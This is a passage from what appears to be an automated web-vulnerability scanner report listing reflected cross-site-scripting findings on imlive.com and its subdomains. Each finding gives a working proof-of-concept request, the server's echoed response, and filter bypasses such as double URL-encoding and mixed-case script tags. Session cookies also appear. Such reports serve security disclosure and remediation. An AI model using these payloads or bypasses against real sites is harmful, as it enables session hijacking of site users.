Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.572. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:48 GMT
Connection: close
Content-Length: 41134
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.573. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:49 GMT
Connection: close
Content-Length: 41283
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.574. http://imlive.com/wmaster.ashx [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /wmaster.ashx

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyLRxWQc0aKAUPIcMr1z98%2F8hVk8Zl52g6XTc8ahIm5wd6Dpvk1%2Ff8Hrm5IPl4A2Xrmhuo0zzjA78ETPbWo0pNpB; path=/
Set-Cookie: ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; path=/
X-Powered-By: vsrv47
Date: Fri, 28 Jan 2011 14:04:49 GMT
Set-Cookie: BIGipServerImlive=2366899778.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8350


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
alytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp244f6%27%3e%3cscript%3ealert%281%29%3c%2fscript%3e7358040fd9f&lr=1107816005&ud=0&pe=404.asp&qs=404;http://imlive.com:80/homepagems3.asp244f6'><script>alert(1)</script>7358040fd9f&sr=0&iy=dallas&id=44&iu=1' height='1' width='1'>
...[SNIP]...

4.575. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
Set-Cookie: spvdr=vd=62454ef9-3278-4fa1-be68-74c4c836f2eb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 22110
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||30418"><script>alert(1)</script>eb906244d97~1');return false;">
...[SNIP]...

4.576. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 21709
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/?76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&iy=dallas&id=44&iu=1&vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.577. http://in.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=in.imlive.com&ul=/waccess/efac5'onerror='alert(1)'f4ba4def511/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://in.imlive.com:80/waccess/efac5'onerror='alert(1)'f4ba4def511/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.578. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:51 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 18915
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/?46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&iy=dallas&id=44&iu=1&vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.579. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://it.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: spvdr=vd=c4be0621-1928-45cc-b3f3-18258a0d7a1f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:50 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18740
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||9e1c9"><a>8cb16e9fe00~1');return false;">
...[SNIP]...

4.580. http://it.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 8305
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=it.imlive.com&ul=/waccess/a32d9'onerror='alert(1)'7223884f696/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://it.imlive.com:80/waccess/a32d9'onerror='alert(1)'7223884f696/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.581. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
Set-Cookie: spvdr=vd=df13fca7-243b-46a1-b685-4ed2e476c681&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:03 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 20266
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;">
...[SNIP]...

4.582. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: spvdr=vd=7a755e33-be6e-4c0d-be05-9c18484cccd6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:04 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
